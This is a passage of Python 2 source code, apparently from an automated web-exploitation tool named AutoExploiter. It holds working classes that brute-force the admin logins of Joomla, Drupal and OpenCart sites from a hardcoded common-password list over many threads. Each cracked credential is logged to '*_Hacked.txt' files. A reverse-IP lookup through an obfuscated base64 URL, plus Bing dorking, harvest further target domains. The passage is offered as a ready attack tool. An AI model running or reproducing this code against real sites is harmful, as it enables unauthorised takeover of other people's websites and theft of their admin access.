  2924. t.start()
  2925. thread.append(t)
  2926. time.sleep(0.02)
  2927. for j in thread:
  2928. j.join()
  2929. if self.flag == 0:
  2930. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
  2931. + self.y + 'Joomla BruteForce' + self.c + ' [Not Vuln]'
  2932.  
  2933. def Joomla(self, site, passwd):
  2934. try:
  2935. sess = requests.session()
  2936. GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5)
  2937. try:
  2938. ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
  2939. GetToken.text.encode('utf-8'))[0]
  2940. GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', GetToken.text.encode('utf-8'))[0]
  2941. except:
  2942. ToKeN = ''
  2943. GeTOPtIoN = 'com_login'
  2944. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  2945. post = {}
  2946. post['username'] = "admin"
  2947. post['passwd'] = passwd
  2948. post['lang'] = 'en-GB'
  2949. post['option'] = GeTOPtIoN
  2950. post['task'] = 'login'
  2951. post[ToKeN] = '1'
  2952. url = "http://" + site + "/administrator/index.php"
  2953. GoT = sess.post(url, data=post, headers=agent, timeout=10)
  2954. if 'logout' in GoT.text.encode('utf-8'):
  2955. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
  2956. self.r + site + ' ' + self.y + 'Joomla' + self.g + ' [Hacked!!]'
  2957. with open('result/Joomla_Hacked.txt', 'a') as writer:
  2958. writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
  2959. '\n Password: ' + passwd + '\n-----------------------------------------\n')
  2960. self.flag = 1
  2961. os._exit(1)
  2962. except Exception, e:
  2963. pass
  2964.  
  2965. class DrupalBruteForce(object):
  2966. def __init__(self, site):
  2967. self.flag = 0
  2968. self.r = '\033[31m'
  2969. self.g = '\033[32m'
  2970. self.y = '\033[33m'
  2971. self.b = '\033[34m'
  2972. self.m = '\033[35m'
  2973. self.c = '\033[36m'
  2974. self.w = '\033[37m'
  2975. self.rr = '\033[39m'
  2976. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
  2977. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
  2978. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
  2979. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
  2980. "12", "123123"]
  2981. thread = []
  2982. for passwd in self.password:
  2983. t = threading.Thread(target=self.Drupal, args=(site, passwd))
  2984. t.start()
  2985. thread.append(t)
  2986. time.sleep(0.02)
  2987. for j in thread:
  2988. j.join()
  2989. if self.flag == 0:
  2990. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
  2991. + self.y + 'Drupal BruteForce' + self.c + ' [Not Vuln]'
  2992.  
  2993. def Drupal(self, site, passwd):
  2994. try:
  2995. sess = requests.session()
  2996. GetToken = sess.get('http://' + site + '/?q=user/login', timeout=5)
  2997. try:
  2998. GetOP = re.findall('id="edit-submit" name="op" value="(.*)"',
  2999. GetToken.text.encode('utf-8'))[0].split('"')[0]
  3000. except:
  3001. GetOP = 'Log in'
  3002. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  3003. post = {}
  3004. post['name'] = "admin"
  3005. post['pass'] = passwd
  3006. post['form_id'] = 'user_login'
  3007. post['op'] = GetOP
  3008. url = "http://" + site + "/?q=user/login"
  3009. GoT = sess.post(url, data=post, headers=agent, timeout=10)
  3010. if 'Log out' in GoT.text.encode('utf-8'):
  3011. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
  3012. self.r + site + ' ' + self.y + 'Drupal' + self.g + ' [Hacked!!]'
  3013. with open('result/Drupal_Hacked.txt', 'a') as writer:
  3014. writer.write('http://' + site + '/?q=user/login' + '\n Username: admin' + '\n Password: ' +
  3015. passwd + '\n-----------------------------------------\n')
  3016. self.flag = 1
  3017. os._exit(1)
  3018. except Exception, e:
  3019. pass
  3020.  
  3021. class OpenCart(object):
  3022. def __init__(self, site):
  3023. self.flag = 0
  3024. self.r = '\033[31m'
  3025. self.g = '\033[32m'
  3026. self.y = '\033[33m'
  3027. self.b = '\033[34m'
  3028. self.m = '\033[35m'
  3029. self.c = '\033[36m'
  3030. self.w = '\033[37m'
  3031. self.rr = '\033[39m'
  3032. self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
  3033. "123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
  3034. "password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
  3035. "demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
  3036. "12", "123123"]
  3037. thread = []
  3038. for passwd in self.password:
  3039. t = threading.Thread(target=self.opencart, args=(site, passwd))
  3040. t.start()
  3041. thread.append(t)
  3042. time.sleep(0.02)
  3043. for j in thread:
  3044. j.join()
  3045. if self.flag == 0:
  3046. print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
  3047. + self.y + 'OpenCart' + self.c + ' [Not Vuln]'
  3048.  
  3049. def opencart(self, site, passwd):
  3050. try:
  3051. agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
  3052. post = {}
  3053. post['username'] = "admin"
  3054. post['password'] = passwd
  3055. url = "http://" + site + "/admin/index.php"
  3056. GoT = requests.post(url, data=post, headers=agent, timeout=10)
  3057. if 'Logout' in GoT.text.encode('utf-8'):
  3058. print self.c + ' [' + self.y + '+' + self.c + '] ' +\
  3059. self.r + site + ' ' + self.y + 'OpenCart' + self.g + ' [Hacked!!]'
  3060. with open('result/OpenCart_Hacked.txt', 'a') as writer:
  3061. writer.write('http://' + site + '/admin/index.php' + '\n Username: admin' + '\n Password: ' +
  3062. passwd + '\n-----------------------------------------\n')
  3063. self.flag = 1
  3064. os._exit(1)
  3065. except Exception, e:
  3066. pass
  3067.  
  3068.  
  3069.  
  3070. class reverse_ipz(object):
  3071. def __init__(self):
  3072. self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  3073. 'Accept': '*/*'}
  3074. def Reverse_ip(self, domain_Or_ipAddress):
  3075.  
  3076. Check = domain_Or_ipAddress
  3077. if Check.startswith("http://"):
  3078. Check = Check.replace("http://", "")
  3079. elif Check.startswith("https://"):
  3080. Check = Check.replace("https://", "")
  3081. else:
  3082. pass
  3083. try:
  3084. self.ip = socket.gethostbyname(Check)
  3085. except:
  3086. sys.exit()
  3087. Rev = requests.get(binascii.a2b_base64('aHR0cDovL3ZpZXdkbnMuaW5mby9yZXZlcnNlaXAvP2hvc3Q9') + self.ip + '&t=1',
  3088. headers=self.headers, timeout=5)
  3089. Revlist = re.findall('<tr> <td>((([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}))</td>', Rev.text)
  3090. if len(Revlist) == 1000:
  3091. for url in Revlist:
  3092. with open('logs/' + self.ip + 'x.txt', 'a') as xx:
  3093. xx.write(str(url[0]) + '\n')
  3094. gotoBing = BingDorker()
  3095. gotoBing.ip_bing(self.ip)
  3096. else:
  3097. for url in Revlist:
  3098. with open('logs/' + self.ip + '.txt', 'a') as xx:
  3099. xx.write(str(url[0]) + '\n')
  3100.  
  3101.  
  3102. class BingDorker(object):
  3103. def ip_bing(self, __ip):
  3104. try:
  3105. if __ip.startswith("http://"):
  3106. __ip = __ip.replace("http://", "")
  3107. elif __ip.startswith("https://"):
  3108. __ip = __ip.replace("https://", "")
  3109. else:
  3110. pass
  3111. try:
  3112. ip = socket.gethostbyname(__ip)
  3113. except:
  3114. sys.exit()
  3115. next = 0
  3116. while next <= 500:
  3117. url = "http://www.bing.com/search?q=ip%3A" + ip + "&first=" + str(next) + "&FORM=PORE"
  3118. sess = requests.session()
  3119. cnn = sess.get(url, timeout=5)
  3120. next = next + 10
  3121. finder = re.findall(
  3122. '<h2><a href="((?:https://|http://)[a-zA-Z0-9-_]+\.*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11})',
  3123. cnn.text)
  3124. for url in finder:
  3125. if url.startswith('http://'):
  3126. url = url.replace('http://', '')
  3127. elif url.startswith('https://'):
  3128. url = url.replace('https://', '')
  3129. else:
  3130. pass
  3131. with open("logs/" + ip + "x.txt", 'a') as f:
  3132. if 'go.microsoft.com' in url:
  3133. pass
  3134. else:
  3135. f.write(str(url + '\n'))
  3136. lines = open("logs/" + ip + "x.txt", 'r').read().splitlines()
  3137. lines_set = set(lines)
  3138. count = 0
  3139. for line in lines_set:
  3140. with open("logs/" + ip + ".txt", 'a') as xx:
  3141. count = count + 1
  3142. xx.write(line + '\n')
  3143. os.unlink("logs/" + ip + "x.txt")
  3144. except IOError:
  3145. sys.exit()
  3146. except IndexError:
  3147. sys.exit()
  3148.  
  3149.  
  3150. Rock = AutoExploiter()